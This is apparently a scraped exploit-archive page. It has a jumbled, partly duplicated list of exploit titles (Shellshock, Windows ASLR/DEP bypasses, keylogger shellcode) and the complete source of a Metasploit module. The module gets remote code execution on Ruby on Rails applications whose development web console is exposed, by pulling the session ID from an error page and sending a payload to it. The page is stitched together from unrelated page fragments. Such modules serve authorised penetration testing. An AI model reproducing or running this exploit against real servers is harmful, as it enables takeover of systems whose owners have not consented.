01664c67b8
11 new exploits JITed egg-hunter stage-0 shellcode Adjusted universal for xp/vista/win7 JITed egg-hunter stage-0 shellcode Adjusted universal for XP/Vista/Windows 7 BlazeDVD 5.1- (.plf) Stack Buffer Overflow PoC Exploit - ALSR/DEP Bypass on Win7 BlazeDVD 5.1 - (.plf) Stack Buffer Overflow PoC Exploit (Windows 7 ALSR/DEP Bypass) Winamp 5.572 - Local BoF Exploit (Win7 ASLR and DEP Bypass) Winamp 5.572 - Local BoF Exploit (Windows 7 ASLR and DEP Bypass) RM Downloader 3.1.3 - Local SEH Exploit (Win7 ASLR and DEP Bypass) RM Downloader 3.1.3 - Local SEH Exploit (Windows 7 ASLR and DEP Bypass) UFO: Alien Invasion 2.2.1 - BoF Exploit (Win7 ASLR and DEP Bypass) UFO: Alien Invasion 2.2.1 - BoF Exploit (Windows 7 ASLR and DEP Bypass) The KMPlayer 3.0.0.1440 - (.mp3) Buffer Overflow Exploit (Win7 + ASLR Bypass) The KMPlayer 3.0.0.1440 - (.mp3) Buffer Overflow Exploit (Windows 7 + ASLR Bypass) Mozilla Firefox 3.6.16 mChannel Object Use After Free Exploit (Win7) Mozilla Firefox 3.6.16 - mChannel Object Use After Free Exploit (Windows 7) QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS QQPLAYER Player 3.2 - PICT PnSize Buffer Overflow Windows DEP_ASLR BYPASS GNU Bash - Environment Variable Command Injection (ShellShock) Bash - Environment Variables Code Injection Exploit (ShellShock) GNU Bash - Environment Variable Command Injection (Shellshock) Bash - Environment Variables Code Injection Exploit (Shellshock) OpenVPN 2.2.29 - ShellShock Exploit OpenVPN 2.2.29 - Shellshock Exploit Bash - CGI RCE Shellshock Exploit (Metasploit) Bash CGI - RCE Shellshock Exploit (Metasploit) PHP 5.x (< 5.6.2) - Shellshock Exploit (Bypass disable_functions) PHP 5.x (< 5.6.2) - Bypass disable_functions (Shellshock Exploit) OSSEC 2.8 - Privilege Escalation OSSEC 2.8 - hosts.deny Privilege Escalation ShellShock dhclient Bash Environment Variable Command Injection PoC dhclient 4.1 - Bash Environment Variable Command Injection PoC (Shellshock) OSSEC 2.7 <= 2.8.1 - Local Root Escalation OSSEC 2.7 <= 2.8.1 - _diff_ Command Local Root Escalation Windows Kernel - Bitmap Handling Use-After-Free (MS15-061) #2 Windows Kernel - Bitmap Handling Use-After-Free (MS15-061) (2) BigTree CMS Cross Site Request Forgery Vulnerability Advantech Switch Bash Environment Variable Code Injection (Shellshock) Advantech Switch - Bash Environment Variable Code Injection (Shellshock) KiTTY Portable <= 0.65.0.2p Local kitty.ini Overflow (Wow64 Egghunter Win7) KiTTY Portable <= 0.65.0.2p Local kitty.ini Overflow (Win8.1/Win10) KiTTY Portable <= 0.65.0.2p - Local kitty.ini Overflow (Wow64 Egghunter Windows 7) KiTTY Portable <= 0.65.0.2p - Local kitty.ini Overflow (Windows 8.1/Windows 10) Windows Null-Free Shellcode - Primitive Keylogger to File - 431 (0x01AF) bytes Ajaxel CMS 8.0 - Multiple Vulnerabilities i.FTP 2.21 - Host Address / URL Field SEH Exploit Dell SonicWall Scrutinizer <= 11.0.1 - setUserSkin/deleteTab SQL Injection Remote Code Execution ZeewaysCMS - Multiple Vulnerabilities ASUS Memory Mapping Driver (ASMMAP/ASMMAP64): Physical Memory Read/Write Certec EDV atvise SCADA Server 2.5.9 - Privilege Escalation Microsoft Windows 7 - WebDAV Privilege Escalation Exploit (MS16-016) (2) RPCScan 2.03 - Hostname/IP Field SEH Overwrite PoC ImageMagick Delegate Arbitrary Command Execution Ruby on Rails Development Web Console (v2) Code Execution
87 lines
No EOL
2.8 KiB
Ruby
Executable file
87 lines
No EOL
2.8 KiB
Ruby
Executable file
##
|
|
# This module requires Metasploit: http://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
require 'msf/core'
|
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
|
Rank = ExcellentRanking
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
def initialize(info = {})
|
|
super(update_info(info,
|
|
'Name' => 'Ruby on Rails Development Web Console (v2) Code Execution',
|
|
'Description' => %q{
|
|
This module exploits a remote code execution feature of the Ruby on Rails
|
|
framework. This feature is exposed if the config.web_console.whitelisted_ips
|
|
setting includes untrusted IP ranges and the web-console gem is enabled.
|
|
},
|
|
'Author' => ['hdm'],
|
|
'License' => MSF_LICENSE,
|
|
'References' =>
|
|
[
|
|
[ 'URL', 'https://github.com/rails/web-console' ]
|
|
],
|
|
'Platform' => 'ruby',
|
|
'Arch' => ARCH_RUBY,
|
|
'Privileged' => false,
|
|
'Targets' => [ ['Automatic', {} ] ],
|
|
'DefaultOptions' => { 'PrependFork' => true },
|
|
'DisclosureDate' => 'May 2 2016',
|
|
'DefaultTarget' => 0))
|
|
|
|
register_options(
|
|
[
|
|
Opt::RPORT(3000),
|
|
OptString.new('TARGETURI', [ true, 'The path to a vulnerable Ruby on Rails application', '/missing404' ])
|
|
], self.class)
|
|
end
|
|
|
|
#
|
|
# Identify the web console path and session ID, then inject code with it
|
|
#
|
|
def exploit
|
|
res = send_request_cgi({
|
|
'uri' => normalize_uri(target_uri.path),
|
|
'method' => 'GET'
|
|
}, 25)
|
|
|
|
unless res
|
|
print_error("Error: No response requesting #{datastore['TARGETURI']}")
|
|
return
|
|
end
|
|
|
|
unless res.body.to_s =~ /data-mount-point='([^']+)'/
|
|
if res.body.to_s.index('Application Trace') && res.body.to_s.index('Toggle session dump')
|
|
print_error('Error: The web console is either disabled or you are not in the whitelisted scope')
|
|
else
|
|
print_error("Error: No rails stack trace found requesting #{datastore['TARGETURI']}")
|
|
end
|
|
return
|
|
end
|
|
|
|
console_path = normalize_uri($1, 'repl_sessions')
|
|
|
|
unless res.body.to_s =~ /data-session-id='([^']+)'/
|
|
print_error("Error: No session id found requesting #{datastore['TARGETURI']}")
|
|
return
|
|
end
|
|
|
|
session_id = $1
|
|
|
|
print_status("Sending payload to #{console_path}/#{session_id}")
|
|
res = send_request_cgi({
|
|
'uri' => normalize_uri(console_path, session_id),
|
|
'method' => 'PUT',
|
|
'headers' => {
|
|
'Accept' => 'application/vnd.web-console.v2',
|
|
'X-Requested-With' => 'XMLHttpRequest'
|
|
},
|
|
'vars_post' => {
|
|
'input' => payload.encoded
|
|
}
|
|
}, 25)
|
|
end
|
|
end |